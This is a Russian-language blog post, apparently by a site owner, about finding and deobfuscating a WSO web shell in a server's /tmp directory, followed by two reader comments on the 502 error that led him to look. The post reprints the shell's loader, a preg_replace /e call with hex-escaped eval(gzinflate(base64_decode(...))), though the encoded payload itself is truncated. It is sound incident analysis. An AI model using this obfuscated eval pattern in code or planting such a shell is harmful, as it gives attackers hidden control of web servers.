Простая деобфускация шелла на preg_replace eval

Решил почему-то зайти на блог, хотя писать не собирался, но повод нашелся  — 502 bad gateway от nginx при попытке войти в админку заставили призадуматься :D Первая мысль — после обновления движка блога в стиле «далее-далее-далее» что-то криво стало, разбираться не особо хотелось. Почему-то решил зайти в /tmp и увидал такое чудо:

$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z_было_много_символов'\x29\x29\x29\x3B",".");

Похоже на Web Shell by oRb :) Подтвердив опасения мнением пары антивирусов (привет DrWeb и Kaspersky, которые не детектровали), начал по-разному проверять, не изменены ли файлы и не появились ли новые.

Затем сравнил с парой образцов, оставленных для коллекции, которые кое-как убереглись от DrWeb и Kasperksy :D, действительно очень похоже на Web Shell by oRb, но вот обфусцированный кусок не такой. Убрал из regexp e, обернул в echo, получилось 2 строки вида eval(gzinflate(base64_decode(‘красотень’))); Стало понятно, почему начало у имеющихся шеллов совпадало с новым, а код нет. Оказалось, что строки с eval одинаковые, прибил вторую, обернул первую в echo и получил исходник WSO 2.5 для коллекции.

Ссылки: stackoverflow, preg-replace

З.ы. признаков шеллов еще где-то бегло не нашел, насчет способа заливки особо не задумывался, но здесь писать не буду, а то другие понабегут хачить :D

Запись опубликована в рубрике PHP, Web Application Security, обфускация с метками . Добавьте в закладки постоянную ссылку.

2 комментария на «Простая деобфускация шелла на preg_replace eval»

  1. hc говорит:

    > 502 bad gateway от nginx при попытке войти в админку заставили призадуматься :D

    А почему первая мысль была не про смену хостинга?.. К черту этих кретинов, раз у них аж гейт не работает. Не?

    • shr говорит:

      502 может быть ошибкой веб-приложения, а не только веб-сервера

      а хостинг халявный и с ним раньше все было нормально

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *